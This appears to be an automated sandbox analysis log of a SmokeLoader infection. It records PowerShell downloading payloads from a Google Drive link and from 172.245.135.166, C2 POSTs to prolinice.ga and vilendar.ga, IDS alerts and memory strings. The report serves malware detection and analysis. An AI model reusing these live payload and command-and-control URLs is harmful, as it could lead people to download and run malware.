              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\

              Software Vulnerabilities

              barindex
              Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.10:49980 -> 45.91.8.152:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.10:49981 -> 45.91.8.152:80
              Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 142.250.185.193:443 -> 192.168.2.10:49778
              Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 45.91.8.152 80
              Source: Malware configuration extractorURLs: http://prolinice.ga/index.php
              Source: Malware configuration extractorURLs: http://vilendar.ga/index.php
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /600/ERFCEE.txt HTTP/1.1Host: 172.245.135.166Connection: Keep-Alive
              Source: Joe Sandbox ViewASN Name: SERV-TECHRU SERV-TECHRU
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Network trafficSuricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 45.91.8.152:80 -> 192.168.2.10:49980
              Source: global trafficHTTP traffic detected: GET /600/seethebestthingsentiretimewithgreatthignstoebe.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.135.166Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wvhejqgucymxstkj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 136Host: prolinice.ga
              Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://prolinice.ga/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 501Host: prolinice.ga
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.135.166
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_03174BB0 URLDownloadToFileW,1_2_03174BB0
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /600/seethebestthingsentiretimewithgreatthignstoebe.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.135.166Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /600/ERFCEE.txt HTTP/1.1Host: 172.245.135.166Connection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: global trafficDNS traffic detected: DNS query: prolinice.ga
              Source: unknownHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wvhejqgucymxstkj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 136Host: prolinice.ga
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 23 Oct 2024 06:15:42 GMTserver: Apache/2.4.59 (Debian)transfer-encoding: chunkedcontent-type: text/html; charset=utf-8Data Raw: 33 37 44 33 0d 0a 84 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 4d 93 dc e5 25 0a ed e2 44 4a 3b 47 a5 77 e3 2c 25 29 67 7b b4 1d 52 9a 46 7a 54 8c 7e 72 ec d5 7e f4 44 cf b3 6b eb a7 41 63 d4 4a be ec 6e e8 4b 42 15 65 fa 28 3b 12 b5 17 01 51 60 01 78 3a 91 7f 32 8b 47 78 ce d5 ea f0 7b d0 1e 45 fe 16 dc 84 fa d9 be 93 bd db 4a 1d 9f ac 79 dd 2f b5 84 79 6d 21 b3 90 51 dc c2 a5 14 5d bd 12 b6 4b 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f 66 73 fe c7 15 ac cd f6 9d 88 6a 44 07 1e 8d 8b 6b 24 18 2b 4b 2a ec 81 b7 50 50 a4 4e ad cf 32 5c c0 15 b4 57 90 1b 0d ee 6c f7 54 23 c9 ed 8e bc 36 a0 b4 7a c0 a1 84 b8 ba d4 a3 62 52 1c ae d9 4b 5a 18 a9 1c db 20 3a d0 44 3f 55 06 6b bf 4b 63 27 f1 ac 4f fe d1 04 8b 3f ba 91 69 f9 fb 81 fe 97 af cd a6 40 69 e9 33 b2 a6 45 cc f6 83 0e 7c 20 5b 7d 1d a4 53 32 fe 9d cc 54 71 e4 4c 20 4c b2 37 b3 8e 0f 1b d8 40 78 f3 c6 c7 84 1a aa 21 d4 fa 17 f2 46 ab 2a 9b db a1 fa 45 c5 f8 a8 f5 78 d7 7b c7 34 f8 40 a6 ce 9e 68 07 d1 3b db 70 67 ae de de 5f 1b 81 d3 b1 e8 be 06 9b bd 51 aa 40 d1 5b 4e 04 32 d7 97 2a e0 96 cc f3 08 be 06 f4 ef f1 48 d0 25 d9 73 3b 22 c7 0f b5 72 bf c3 e5 81 32 31 c9 f4 a1 4c ee 90 56 05 52 a9 1c 76 6f 99 dc ff 39 62 09 4e 0e 7c a8 50 2c 99 64 73 2c f8 8e 19 ec 5e 4c 2b 1b 6a 20 6d e3 2e 26 3e f2 ee 67 21 84 c5 3d 2f 72 90 3a ea 6c 5f b3 01 1d 55 2a 97 6b 1b 48 d7 18 d0 92 ef 20 3e 28 8e b6 b7 0f 4f c2 e3 41 ee a3 e2 e5 4f 7c 04 cf 84 8c 71 e5 91 3b ef 9c 40 2b b4 81 b3 6f 0c e5 ea f4 a9 02 25 53 be 6e 6e 71 ce db f8 20 6e 55 5b a4 66 26 ed 43 1b d2 35 1a 47 54 5d 20 0c 1b 03 8a 54 94 fb f1 d9 5d 91 01 a9 f6 90 b3 3e c6 10 cc 67 ca 7b 76 0b 97 06 5b d8 d2 e2 0f 79 af ed 1b 53 92 e1 e9 cc 7a b6 b9 98 42 38 a5 00 49 58 88 86 83 3c a1 5c d3 72 7d ad bc 8d 80 b4 ea 85 32 d9 b9 33 ce ae d5 90 f4 bb 3a c9 3d 3b 48 a7 e3 58 dd be d0 8a aa 01 3e 48 f4 19 2b 95 d5 65 ff b4 78 a1 d2 cd 69 0a 91 f7 6a 18 3d 4f 75 b1 bc 1b b1 60 c8 27 8c 70 db 33 0d a6 f2 ed 80 8d aa 7c 4a 8c 59 8c 3d 99 a9 52 09 0f d9 5e 58 eb 6f 11 c9 5b 23 0e a9 04 11 b7 a5 6b eb 6e 85 01 89 5e cf 54 06 96 02 2d c3 92 6c 61 40 ee 39 ff fa 3e 0d c6 24 8f 1c 02 ac 7a ab 13 d0 be a8 cb 90 7c 6b d5 fb ae 58 ee db 76 10 36 cb d3 c0 5d 0e e0 08 4f 38 94 52 92 70 bf 7c bd c4 0d 6f f9 74 7a 41 a6 59 ea 90 d6 8f 1b 32 75 08 c5 9a 2d a0 6a 8b fd 6b c4 c2 37 35 48 bd 8c 96 77 e4 62 45 8d 49 72 d0 11 c5 42 47 60 cf 79 cc d5 44 76 86 c6 57 e5 fc f1 b9 98 00 52 87 30 6d b6 64 39 d2
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 23 Oct 2024 06:15:48 GMTserver: Apache/2.4.59 (Debian)content-length: 409content-type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 39 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 70 72 6f 6c 69 6e 69 63 65 2e 67 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>
              Source: powershell.exe, 00000001.00000002.1442591521.0000000004D6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.135.166/600/seeth
              Source: powershell.exe, 00000001.00000002.1442591521.0000000004D6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.135.166/600/seethebestthingsentiretimewithgreatthignstoebe.tIF
              Source: powershell.exe, 00000001.00000002.1441509755.0000000002FCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.135.166/600/seethebestthingsentiretimewithgreatthignstoebe.tIF1
              Source: powershell.exe, 00000001.00000002.1451121837.0000000007518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.135.166/600/seethebestthingsentiretimewithgreatthignstoebe.tIFA
              Source: powershell.exe, 00000001.00000002.1441509755.0000000002FCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.135.166/600/seethebestthingsentiretimewithgreatthignstoebe.tIF_
              Source: powershell.exe, 00000001.00000002.1451121837.0000000007518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.135.166/600/seethebestthingsentiretimewithgreatthignstoebe.tIFt
              Source: explorer.exe, 0000000E.00000000.1754609723.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1754609723.00000000094DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: explorer.exe, 0000000E.00000000.1754609723.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1754609723.00000000094DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: explorer.exe, 0000000E.00000000.1754609723.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1754609723.0000000009519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1754609723.00000000094DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: powershell.exe, 00000003.00000002.1326423654.0000000005779000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
              Source: powershell.exe, 00000001.00000002.1448623552.0000000005A1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1328341542.00000000060AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700233165.0000000005A69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: explorer.exe, 0000000E.00000000.1754609723.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1754609723.00000000094DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: explorer.exe, 0000000E.00000000.1749537667.000000000305D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2158540927.000000000305D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
              Source: powershell.exe, 0000000A.00000002.1700233165.0000000004B58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1697699849.00000000008FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: explorer.exe, 00000013.00000002.2014590049.0000000002CD7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.2014590049.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.2014590049.0000000002D4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/
              Source: explorer.exe, 00000013.00000002.2014590049.0000000002D45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/)
              Source: explorer.exe, 00000013.00000002.2014590049.0000000002D45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/;
              Source: explorer.exe, 00000013.00000002.2014590049.0000000002D4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0
              Source: explorer.exe, 00000013.00000002.2014590049.0000000002CD7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.2014590049.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.1995400275.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.1997904056.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2535368092.0000000002D67000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2112839505.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2535747935.0000000002CF7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2535507694.0000000000450000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2536095977.0000000002AB7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2535527789.0000000000C09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/index.php
              Source: explorer.exe, 00000013.00000002.2014590049.0000000002CD7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.1995400275.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.1997904056.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2535368092.0000000002D67000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2112839505.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2535747935.0000000002CF7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2535507694.0000000000450000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2536095977.0000000002AB7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2535527789.0000000000C09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/index.phpMozilla/5.0
              Source: explorer.exe, 00000013.00000002.2014590049.0000000002D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/ndex.php
              Source: explorer.exe, 00000013.00000002.2014590049.0000000002D45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/z
              Source: explorer.exe, 0000000E.00000000.1749297588.0000000002C00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1753289408.0000000007B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1753243841.0000000007AF0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
              Source: powershell.exe, 00000003.00000002.1326423654.0000000005196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000001.00000002.1442591521.00000000049B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1326423654.0000000005041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2180174511.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700233165.0000000004A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000003.00000002.1326423654.0000000005196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: explorer.exe, 0000000E.00000003.2161939139.0000000000978000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wvhejqgucymxstkj.com/
              Source: explorer.exe, 0000000E.00000003.2161939139.0000000000978000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wvhejqgucymxstkj.com/application/x-ww
              Source: powershell.exe, 0000000A.00000002.1700233165.0000000004B58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1697699849.00000000008FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: explorer.exe, 0000000E.00000003.2159424837.00000000096A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1755609685.00000000095B9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
              Source: powershell.exe, 00000003.00000002.1336183059.00000000086C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
              Source: explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: explorer.exe, 0000000E.00000003.2159660741.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1761907243.000000000D1B6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppin
              Source: powershell.exe, 00000008.00000002.2180174511.0000000005299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6LR
              Source: powershell.exe, 00000001.00000002.1442591521.00000000049B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1326423654.0000000005041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2180174511.00000000052AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700233165.0000000004A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000003.00000002.1326423654.0000000005196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
              Source: explorer.exe, 0000000E.00000003.2162007420.000000000D1F9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2159660741.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1761907243.000000000D1B6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
              Source: explorer.exe, 0000000E.00000000.1754609723.00000000093B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/$
              Source: explorer.exe, 0000000E.00000000.1754609723.00000000093B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/X
              Source: explorer.exe, 0000000E.00000002.2535055415.0000000000889000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1748502813.0000000000889000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2158540927.0000000002FAD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1749537667.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2160994269.0000000002FBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: explorer.exe, 0000000E.00000000.1754609723.00000000093B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
              Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=C2BB6DDCE8D847D6B779FE8AEC27D161&timeOut=5000&oc
              Source: explorer.exe, 0000000E.00000003.2158540927.0000000002FAD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1749537667.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
              Source: explorer.exe, 0000000E.00000000.1754609723.0000000009390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comWzE
              Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
              Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
              Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
              Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
              Source: explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
              Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
              Source: explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 0000000A.00000002.1700233165.0000000005A69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
